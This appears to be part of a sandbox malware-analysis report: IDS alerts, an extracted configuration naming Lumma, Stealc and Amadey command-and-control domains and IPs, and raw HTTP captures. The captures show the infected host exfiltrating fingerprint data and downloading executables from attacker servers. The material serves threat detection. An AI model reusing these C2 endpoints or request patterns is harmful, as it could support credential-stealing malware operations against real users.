Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50021 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50027 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50029 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50031 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50040 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50042 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50045 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49999 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50049 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:63441 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50083 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:59530 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:51068 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50087 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50090 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50080 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50092 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50089 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50093 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50086 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50125 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:63887 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49754 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50007 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50010 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50010 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49732 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50040 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50042 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50092 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50080 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50080 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50004 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49994 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49994 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50090 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50090 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown Network traffic detected: DNS query count 33
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:24:20 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:24:27 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:09 GMTContent-Type: application/octet-streamContent-Length: 2994688Last-Modified: Wed, 30 Oct 2024 04:12:46 GMTConnection: keep-aliveETag: "6721b23e-2db200"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:20 GMTContent-Type: application/octet-streamContent-Length: 2145792Last-Modified: Wed, 30 Oct 2024 04:12:59 GMTConnection: keep-aliveETag: "6721b24b-20be00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:30 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 30 Oct 2024 03:11:49 GMTConnection: keep-aliveETag: "6721a3f5-e0800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:34 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:38 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:43 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:25:54 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:26:02 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:26:20 GMTContent-Type: application/octet-streamContent-Length: 2899456Last-Modified: Wed, 30 Oct 2024 03:12:16 GMTConnection: keep-aliveETag: "6721a410-2c3e00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 30 Oct 2024 04:26:22 GMTContent-Type: application/octet-streamContent-Length: 1883648Last-Modified: Wed, 30 Oct 2024 04:13:06 GMTConnection: keep-aliveETag: "6721b252-1cbe00"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002535001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002536001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="build"tale------HJDHCFCBGIDGHJJKJJDG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002537001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="build"tale------AAEGHJKJKKJDHIDHJKJD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002538001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGCBKFBGIIIECAAAKFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 42 4b 46 42 47 49 49 49 45 43 41 41 41 4b 46 43 2d 2d 0d 0a Data Ascii: ------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------CBGCBKFBGIIIECAAAKFCContent-Disposition: form-data; name="build"tale------CBGCBKFBGIIIECAAAKFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 30 45 38 39 38 41 35 31 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 2d 2d 0d 0a Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="hwid"3D0E898A519D1524750037------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="build"tale------KKFHJDAEHIEHJJKFBGDA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
